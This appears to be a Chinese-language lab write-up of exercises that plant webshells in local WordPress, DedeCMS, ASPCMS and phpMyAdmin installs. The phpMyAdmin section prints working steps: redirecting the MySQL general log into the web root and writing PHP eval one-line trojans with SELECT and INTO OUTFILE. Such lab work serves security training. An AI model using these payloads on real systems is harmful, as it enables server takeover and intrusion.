练习一:wordpress漏洞测试
1.上传包含木马的主题
安装网站




登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包


上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件




练习2:DedeCMS-V5.7.82-UTF8 漏洞测试
安装网站






登录后台管理网站

1.通过文件管理器上传webshell




2.修改模板文件拿webshell




浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接


4.通过后台sql命令执行拿webshell


查看文件属性 发现是刚才写入的文件

进行木马连接


练习3:ASPCMS漏洞测试




登录网站后台






再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功


配置文件中写入了一句话木马

木马连接


练习4:PHPMyAdmin漏洞测试


网站根目录下更新了目录

访问网站 数据库账户密码 登录
1.界面图形化getshell

2.通过日志文件getshell
show global variables like '%general%';
查看 状态 (同样也可以在这里进行命令也可以修改日志位置)
set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马
select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接


3.导入导出getshell
先判断mysql位置

猜测网站路径D:/phpstudy_pro/www
写入木马文件
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';


进行木马连接
